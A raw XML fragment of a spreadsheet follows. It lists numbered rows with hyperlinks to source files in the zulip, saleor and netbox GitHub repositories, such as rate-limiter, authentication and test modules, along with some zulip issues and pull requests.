        <v>https://github.com/zulip/zulip/tree/11.2/tools/documentation_crawler/documentation_crawler/spiders/common/spiders.py</v>
      </c>
      <c r="F42" t="s">
        <v>815</v>
      </c>
      <c r="H42" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="43" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A43">
        <v>65</v>
      </c>
      <c r="B43" t="s">
        <v>8</v>
      </c>
      <c r="C43" t="s">
        <v>501</v>
      </c>
      <c r="D43" t="s">
        <v>497</v>
      </c>
      <c r="E43" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zilencer/views.py", "https://github.com/zulip/zulip/tree/11.2/zilencer/views.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zilencer/views.py</v>
      </c>
      <c r="F43" t="s">
        <v>815</v>
      </c>
      <c r="H43" t="s">
        <v>820</v>
      </c>
    </row>
    <row r="44" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A44">
        <v>66</v>
      </c>
      <c r="B44" t="s">
        <v>502</v>
      </c>
      <c r="C44" t="s">
        <v>503</v>
      </c>
      <c r="D44" t="s">
        <v>497</v>
      </c>
      <c r="E44" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zilencer/views.py", "https://github.com/zulip/zulip/tree/11.2/zilencer/views.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zilencer/views.py</v>
      </c>
      <c r="F44" t="s">
        <v>822</v>
      </c>
      <c r="H44" s="5" t="s">
        <v>821</v>
      </c>
    </row>
    <row r="45" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A45">
        <v>68</v>
      </c>
      <c r="B45" t="s">
        <v>8</v>
      </c>
      <c r="C45" t="s">
        <v>504</v>
      </c>
      <c r="D45" t="s">
        <v>497</v>
      </c>
      <c r="E45" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_push_notifications.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_push_notifications.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_push_notifications.py</v>
      </c>
      <c r="F45" t="s">
        <v>815</v>
      </c>
      <c r="H45" t="s">
        <v>823</v>
      </c>
    </row>
    <row r="46" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A46">
        <v>69</v>
      </c>
      <c r="B46" t="s">
        <v>17</v>
      </c>
      <c r="C46" t="s">
        <v>505</v>
      </c>
      <c r="D46" t="s">
        <v>497</v>
      </c>
      <c r="E46" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_decorators.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_decorators.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_decorators.py</v>
      </c>
      <c r="F46" s="4" t="s">
        <v>818</v>
      </c>
      <c r="H46" s="2" t="s">
        <v>824</v>
      </c>
    </row>
    <row r="47" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A47">
        <v>70</v>
      </c>
      <c r="B47" t="s">
        <v>126</v>
      </c>
      <c r="C47" t="s">
        <v>506</v>
      </c>
      <c r="D47" t="s">
        <v>497</v>
      </c>
      <c r="E47" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_decorators.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_decorators.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_decorators.py</v>
      </c>
      <c r="F47" t="s">
        <v>818</v>
      </c>
      <c r="H47" t="s">
        <v>825</v>
      </c>
    </row>
    <row r="48" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A48">
        <v>72</v>
      </c>
      <c r="B48" t="s">
        <v>79</v>
      </c>
      <c r="C48" t="s">
        <v>507</v>
      </c>
      <c r="D48" t="s">
        <v>497</v>
      </c>
      <c r="E48" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_decorators.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_decorators.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_decorators.py</v>
      </c>
      <c r="F48" t="s">
        <v>818</v>
      </c>
      <c r="H48" s="2" t="s">
        <v>825</v>
      </c>
    </row>
    <row r="49" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A49">
        <v>73</v>
      </c>
      <c r="B49" t="s">
        <v>48</v>
      </c>
      <c r="C49" t="s">
        <v>508</v>
      </c>
      <c r="D49" t="s">
        <v>497</v>
      </c>
      <c r="E49" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_external.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_external.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_external.py</v>
      </c>
      <c r="F49" t="s">
        <v>818</v>
      </c>
      <c r="H49" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="50" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A50">
        <v>74</v>
      </c>
      <c r="B50" t="s">
        <v>96</v>
      </c>
      <c r="C50" t="s">
        <v>509</v>
      </c>
      <c r="D50" t="s">
        <v>497</v>
      </c>
      <c r="E50" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_signup.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_signup.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_signup.py</v>
      </c>
      <c r="F50" t="s">
        <v>815</v>
      </c>
      <c r="H50" s="2" t="s">
        <v>827</v>
      </c>
    </row>
    <row r="51" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A51">
        <v>75</v>
      </c>
      <c r="B51" t="s">
        <v>8</v>
      </c>
      <c r="C51" t="s">
        <v>510</v>
      </c>
      <c r="D51" t="s">
        <v>497</v>
      </c>
      <c r="E51" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_slack_importer.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_slack_importer.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_slack_importer.py</v>
      </c>
      <c r="F51" t="s">
        <v>815</v>
      </c>
      <c r="H51" t="s">
        <v>828</v>
      </c>
    </row>
    <row r="52" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A52">
        <v>76</v>
      </c>
      <c r="B52" t="s">
        <v>126</v>
      </c>
      <c r="C52" t="s">
        <v>511</v>
      </c>
      <c r="D52" t="s">
        <v>497</v>
      </c>
      <c r="E52" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_upload.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_upload.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_upload.py</v>
      </c>
      <c r="F52" t="s">
        <v>818</v>
      </c>
      <c r="H52" s="2" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="53" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A53">
        <v>78</v>
      </c>
      <c r="B53" t="s">
        <v>53</v>
      </c>
      <c r="C53" t="s">
        <v>512</v>
      </c>
      <c r="D53" t="s">
        <v>497</v>
      </c>
      <c r="E53" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_auth_backends.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_auth_backends.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_auth_backends.py</v>
      </c>
      <c r="F53" t="s">
        <v>815</v>
      </c>
      <c r="H53" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="54" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A54">
        <v>80</v>
      </c>
      <c r="B54" t="s">
        <v>126</v>
      </c>
      <c r="C54" t="s">
        <v>511</v>
      </c>
      <c r="D54" t="s">
        <v>497</v>
      </c>
      <c r="E54" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_thumbnail.py", "https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_thumbnail.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/tests/test_thumbnail.py</v>
      </c>
      <c r="F54" t="s">
        <v>815</v>
      </c>
      <c r="H54" s="2" t="s">
        <v>830</v>
      </c>
    </row>
    <row r="55" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A55">
        <v>81</v>
      </c>
      <c r="B55" t="s">
        <v>8</v>
      </c>
      <c r="C55" t="s">
        <v>513</v>
      </c>
      <c r="D55" t="s">
        <v>497</v>
      </c>
      <c r="E55" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/management/commands/reset_authentication_attempt_count.py", "https://github.com/zulip/zulip/tree/11.2/zerver/management/commands/reset_authentication_attempt_count.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/management/commands/reset_authentication_attempt_count.py</v>
      </c>
    </row>
    <row r="56" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A56">
        <v>82</v>
      </c>
      <c r="B56" t="s">
        <v>17</v>
      </c>
      <c r="C56" t="s">
        <v>514</v>
      </c>
      <c r="D56" t="s">
        <v>497</v>
      </c>
      <c r="E56" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/management/commands/check_redis.py", "https://github.com/zulip/zulip/tree/11.2/zerver/management/commands/check_redis.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/management/commands/check_redis.py</v>
      </c>
      <c r="F56" t="s">
        <v>815</v>
      </c>
      <c r="H56" s="2" t="s">
        <v>831</v>
      </c>
    </row>
    <row r="57" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A57">
        <v>83</v>
      </c>
      <c r="B57" t="s">
        <v>53</v>
      </c>
      <c r="C57" t="s">
        <v>515</v>
      </c>
      <c r="D57" t="s">
        <v>497</v>
      </c>
      <c r="E57" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/models/users.py", "https://github.com/zulip/zulip/tree/11.2/zerver/models/users.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/models/users.py</v>
      </c>
      <c r="F57" s="4" t="s">
        <v>832</v>
      </c>
      <c r="H57" t="s">
        <v>833</v>
      </c>
      <c r="I57" s="6"/>
      <c r="J57" s="6"/>
      <c r="K57" s="6"/>
    </row>
    <row r="58" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A58">
        <v>84</v>
      </c>
      <c r="B58" t="s">
        <v>96</v>
      </c>
      <c r="C58" t="s">
        <v>516</v>
      </c>
      <c r="D58" t="s">
        <v>497</v>
      </c>
      <c r="E58" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/openapi/python_examples.py", "https://github.com/zulip/zulip/tree/11.2/zerver/openapi/python_examples.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/openapi/python_examples.py</v>
      </c>
      <c r="F58" t="s">
        <v>815</v>
      </c>
      <c r="H58" t="s">
        <v>834</v>
      </c>
    </row>
    <row r="59" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A59">
        <v>89</v>
      </c>
      <c r="B59" t="s">
        <v>152</v>
      </c>
      <c r="C59" t="s">
        <v>517</v>
      </c>
      <c r="D59" t="s">
        <v>497</v>
      </c>
      <c r="E59" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/event_schema.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/event_schema.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/event_schema.py</v>
      </c>
      <c r="F59" t="s">
        <v>822</v>
      </c>
      <c r="H59" s="5" t="s">
        <v>835</v>
      </c>
    </row>
    <row r="60" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A60">
        <v>92</v>
      </c>
      <c r="B60" t="s">
        <v>17</v>
      </c>
      <c r="C60" t="s">
        <v>518</v>
      </c>
      <c r="D60" t="s">
        <v>497</v>
      </c>
      <c r="E60" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/rest.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/rest.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/rest.py</v>
      </c>
      <c r="F60" t="s">
        <v>818</v>
      </c>
      <c r="H60" t="s">
        <v>836</v>
      </c>
    </row>
    <row r="61" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A61">
        <v>94</v>
      </c>
      <c r="B61" t="s">
        <v>53</v>
      </c>
      <c r="C61" t="s">
        <v>519</v>
      </c>
      <c r="D61" t="s">
        <v>497</v>
      </c>
      <c r="E61" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py</v>
      </c>
      <c r="F61" t="s">
        <v>818</v>
      </c>
      <c r="H61" t="s">
        <v>837</v>
      </c>
    </row>
    <row r="62" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A62">
        <v>95</v>
      </c>
      <c r="B62" t="s">
        <v>8</v>
      </c>
      <c r="C62" t="s">
        <v>520</v>
      </c>
      <c r="D62" t="s">
        <v>497</v>
      </c>
      <c r="E62" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py</v>
      </c>
      <c r="F62" t="s">
        <v>818</v>
      </c>
      <c r="H62" t="s">
        <v>837</v>
      </c>
    </row>
    <row r="63" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A63">
        <v>96</v>
      </c>
      <c r="B63" t="s">
        <v>521</v>
      </c>
      <c r="C63" t="s">
        <v>522</v>
      </c>
      <c r="D63" t="s">
        <v>497</v>
      </c>
      <c r="E63" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py</v>
      </c>
      <c r="F63" t="s">
        <v>818</v>
      </c>
      <c r="H63" t="s">
        <v>837</v>
      </c>
    </row>
    <row r="64" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A64">
        <v>97</v>
      </c>
      <c r="B64" t="s">
        <v>126</v>
      </c>
      <c r="C64" t="s">
        <v>523</v>
      </c>
      <c r="D64" t="s">
        <v>497</v>
      </c>
      <c r="E64" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/rate_limiter.py</v>
      </c>
      <c r="F64" t="s">
        <v>818</v>
      </c>
      <c r="H64" t="s">
        <v>837</v>
      </c>
    </row>
    <row r="65" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A65">
        <v>104</v>
      </c>
      <c r="B65" t="s">
        <v>48</v>
      </c>
      <c r="C65" t="s">
        <v>524</v>
      </c>
      <c r="D65" t="s">
        <v>497</v>
      </c>
      <c r="E65" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/test_helpers.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/test_helpers.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/test_helpers.py</v>
      </c>
      <c r="F65" t="s">
        <v>815</v>
      </c>
      <c r="H65" t="s">
        <v>838</v>
      </c>
    </row>
    <row r="66" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A66">
        <v>105</v>
      </c>
      <c r="B66" t="s">
        <v>525</v>
      </c>
      <c r="C66" t="s">
        <v>526</v>
      </c>
      <c r="D66" t="s">
        <v>497</v>
      </c>
      <c r="E66" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/test_classes.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/test_classes.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/test_classes.py</v>
      </c>
    </row>
    <row r="67" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A67">
        <v>106</v>
      </c>
      <c r="B67" t="s">
        <v>48</v>
      </c>
      <c r="C67" t="s">
        <v>527</v>
      </c>
      <c r="D67" t="s">
        <v>497</v>
      </c>
      <c r="E67" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zerver/lib/email_mirror.py", "https://github.com/zulip/zulip/tree/11.2/zerver/lib/email_mirror.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zerver/lib/email_mirror.py</v>
      </c>
    </row>
    <row r="68" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A68">
        <v>109</v>
      </c>
      <c r="B68" t="s">
        <v>528</v>
      </c>
      <c r="C68" t="s">
        <v>529</v>
      </c>
      <c r="D68" t="s">
        <v>497</v>
      </c>
      <c r="E68" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zproject/computed_settings.py", "https://github.com/zulip/zulip/tree/11.2/zproject/computed_settings.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zproject/computed_settings.py</v>
      </c>
    </row>
    <row r="69" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A69">
        <v>110</v>
      </c>
      <c r="B69" t="s">
        <v>17</v>
      </c>
      <c r="C69" t="s">
        <v>530</v>
      </c>
      <c r="D69" t="s">
        <v>497</v>
      </c>
      <c r="E69" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zproject/computed_settings.py", "https://github.com/zulip/zulip/tree/11.2/zproject/computed_settings.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zproject/computed_settings.py</v>
      </c>
    </row>
    <row r="70" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A70">
        <v>111</v>
      </c>
      <c r="B70" t="s">
        <v>8</v>
      </c>
      <c r="C70" t="s">
        <v>531</v>
      </c>
      <c r="D70" t="s">
        <v>497</v>
      </c>
      <c r="E70" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zproject/computed_settings.py", "https://github.com/zulip/zulip/tree/11.2/zproject/computed_settings.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zproject/computed_settings.py</v>
      </c>
    </row>
    <row r="71" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A71">
        <v>112</v>
      </c>
      <c r="B71" t="s">
        <v>79</v>
      </c>
      <c r="C71" t="s">
        <v>532</v>
      </c>
      <c r="D71" t="s">
        <v>497</v>
      </c>
      <c r="E71" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zproject/default_settings.py", "https://github.com/zulip/zulip/tree/11.2/zproject/default_settings.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zproject/default_settings.py</v>
      </c>
    </row>
    <row r="72" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A72">
        <v>114</v>
      </c>
      <c r="B72" t="s">
        <v>278</v>
      </c>
      <c r="C72" t="s">
        <v>533</v>
      </c>
      <c r="D72" t="s">
        <v>497</v>
      </c>
      <c r="E72" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zproject/default_settings.py", "https://github.com/zulip/zulip/tree/11.2/zproject/default_settings.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zproject/default_settings.py</v>
      </c>
    </row>
    <row r="73" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A73">
        <v>115</v>
      </c>
      <c r="B73" t="s">
        <v>53</v>
      </c>
      <c r="C73" t="s">
        <v>534</v>
      </c>
      <c r="D73" t="s">
        <v>497</v>
      </c>
      <c r="E73" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zproject/prod_settings_template.py", "https://github.com/zulip/zulip/tree/11.2/zproject/prod_settings_template.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zproject/prod_settings_template.py</v>
      </c>
    </row>
    <row r="74" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A74">
        <v>116</v>
      </c>
      <c r="B74" t="s">
        <v>17</v>
      </c>
      <c r="C74" t="s">
        <v>535</v>
      </c>
      <c r="D74" t="s">
        <v>497</v>
      </c>
      <c r="E74" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zproject/backends.py", "https://github.com/zulip/zulip/tree/11.2/zproject/backends.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zproject/backends.py</v>
      </c>
    </row>
    <row r="75" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A75">
        <v>117</v>
      </c>
      <c r="B75" t="s">
        <v>536</v>
      </c>
      <c r="C75" t="s">
        <v>537</v>
      </c>
      <c r="D75" t="s">
        <v>497</v>
      </c>
      <c r="E75" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/zproject/backends.py", "https://github.com/zulip/zulip/tree/11.2/zproject/backends.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/zproject/backends.py</v>
      </c>
    </row>
    <row r="76" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A76">
        <v>119</v>
      </c>
      <c r="B76" t="s">
        <v>79</v>
      </c>
      <c r="C76" t="s">
        <v>538</v>
      </c>
      <c r="D76" t="s">
        <v>497</v>
      </c>
      <c r="E76" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/analytics/lib/counts.py", "https://github.com/zulip/zulip/tree/11.2/analytics/lib/counts.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/analytics/lib/counts.py</v>
      </c>
    </row>
    <row r="77" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A77">
        <v>120</v>
      </c>
      <c r="B77" t="s">
        <v>17</v>
      </c>
      <c r="C77" t="s">
        <v>539</v>
      </c>
      <c r="D77" t="s">
        <v>497</v>
      </c>
      <c r="E77" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/analytics/lib/counts.py", "https://github.com/zulip/zulip/tree/11.2/analytics/lib/counts.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/analytics/lib/counts.py</v>
      </c>
    </row>
    <row r="78" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A78">
        <v>121</v>
      </c>
      <c r="B78" t="s">
        <v>540</v>
      </c>
      <c r="C78" t="s">
        <v>541</v>
      </c>
      <c r="D78" t="s">
        <v>497</v>
      </c>
      <c r="E78" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/tree/3.21.19/saleor/asgi/gzip_compression.py", "https://github.com/saleor/saleor/tree/3.21.19/saleor/asgi/gzip_compression.py")</f>
        <v>https://github.com/saleor/saleor/tree/3.21.19/saleor/asgi/gzip_compression.py</v>
      </c>
      <c r="F78" t="s">
        <v>840</v>
      </c>
      <c r="H78" s="5" t="s">
        <v>839</v>
      </c>
    </row>
    <row r="79" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A79">
        <v>122</v>
      </c>
      <c r="B79" t="s">
        <v>542</v>
      </c>
      <c r="C79" t="s">
        <v>543</v>
      </c>
      <c r="D79" t="s">
        <v>497</v>
      </c>
      <c r="E79" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/tree/3.21.19/saleor/asgi/gzip_compression.py", "https://github.com/saleor/saleor/tree/3.21.19/saleor/asgi/gzip_compression.py")</f>
        <v>https://github.com/saleor/saleor/tree/3.21.19/saleor/asgi/gzip_compression.py</v>
      </c>
      <c r="F79" t="s">
        <v>840</v>
      </c>
      <c r="H79" t="s">
        <v>825</v>
      </c>
    </row>
    <row r="80" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A80">
        <v>126</v>
      </c>
      <c r="B80" t="s">
        <v>42</v>
      </c>
      <c r="C80" t="s">
        <v>544</v>
      </c>
      <c r="D80" t="s">
        <v>497</v>
      </c>
      <c r="E80" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/tree/3.21.19/saleor/tests/e2e/account/account/test_should_not_be_able_to_login_with_invalid_credentials.py", "https://github.com/saleor/saleor/tree/3.21.19/saleor/tests/e2e/account/account/test_should_not_be_able_to_login_with_invalid_credentials.py")</f>
        <v>https://github.com/saleor/saleor/tree/3.21.19/saleor/tests/e2e/account/account/test_should_not_be_able_to_login_with_invalid_credentials.py</v>
      </c>
      <c r="F80" t="s">
        <v>818</v>
      </c>
      <c r="H80" s="5" t="s">
        <v>841</v>
      </c>
    </row>
    <row r="81" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A81">
        <v>131</v>
      </c>
      <c r="B81" t="s">
        <v>545</v>
      </c>
      <c r="C81" t="s">
        <v>546</v>
      </c>
      <c r="D81" t="s">
        <v>497</v>
      </c>
      <c r="E81" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/tree/3.21.19/saleor/graphql/core/tests/garbage_collection/test_gzip.py", "https://github.com/saleor/saleor/tree/3.21.19/saleor/graphql/core/tests/garbage_collection/test_gzip.py")</f>
        <v>https://github.com/saleor/saleor/tree/3.21.19/saleor/graphql/core/tests/garbage_collection/test_gzip.py</v>
      </c>
      <c r="F81" t="s">
        <v>815</v>
      </c>
      <c r="H81" s="5" t="s">
        <v>842</v>
      </c>
    </row>
    <row r="82" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A82">
        <v>132</v>
      </c>
      <c r="B82" t="s">
        <v>547</v>
      </c>
      <c r="C82" t="s">
        <v>548</v>
      </c>
      <c r="D82" t="s">
        <v>458</v>
      </c>
      <c r="E82" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/tree/v4.4.1/docs/development/web-ui.md", "https://github.com/netbox-community/netbox/tree/v4.4.1/docs/development/web-ui.md")</f>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/docs/development/web-ui.md</v>
      </c>
    </row>
    <row r="83" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A83">
        <v>143</v>
      </c>
      <c r="B83" t="s">
        <v>378</v>
      </c>
      <c r="C83" t="s">
        <v>549</v>
      </c>
      <c r="D83" t="s">
        <v>497</v>
      </c>
      <c r="E83" s="3"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3" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="84" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A84">
        <v>146</v>
      </c>
      <c r="B84" t="s">
        <v>550</v>
      </c>
      <c r="C84" t="s">
        <v>551</v>
      </c>
      <c r="D84" t="s">
        <v>497</v>
      </c>
      <c r="E84"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4" t="s">
        <v>815</v>
      </c>
      <c r="G84" s="4" t="s">
        <v>890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workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="H29" sqref="H29"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="7" max="7" width="92.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2">
        <v>3</v>
      </c>
      <c r="B2" t="s">
        <v>552</v>
      </c>
      <c r="C2" t="s">
        <v>553</v>
      </c>
      <c r="D2" t="s">
        <v>10</v>
      </c>
      <c r="E2" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/301", "https://github.com/zulip/zulip/issues/301")</f>
        <v>https://github.com/zulip/zulip/issues/301</v>
      </c>
      <c r="F2" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="3" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3">
        <v>24</v>
      </c>
      <c r="B3" t="s">
        <v>554</v>
      </c>
      <c r="C3" t="s">
        <v>555</v>
      </c>
      <c r="D3" t="s">
        <v>10</v>
      </c>
      <c r="E3" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/3781", "https://github.com/zulip/zulip/issues/3781")</f>
        <v>https://github.com/zulip/zulip/issues/3781</v>
      </c>
      <c r="F3" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="4" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>56</v>
      </c>
      <c r="B4" t="s">
        <v>554</v>
      </c>
      <c r="C4" t="s">
        <v>556</v>
      </c>
      <c r="D4" t="s">
        <v>10</v>
      </c>
      <c r="E4" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/8050", "https://github.com/zulip/zulip/pull/8050")</f>
        <v>https://github.com/zulip/zulip/pull/8050</v>
      </c>
      <c r="F4" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="5" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>70</v>
      </c>
      <c r="B5" t="s">
        <v>557</v>
      </c>
      <c r="C5" t="s">
        <v>558</v>
      </c>
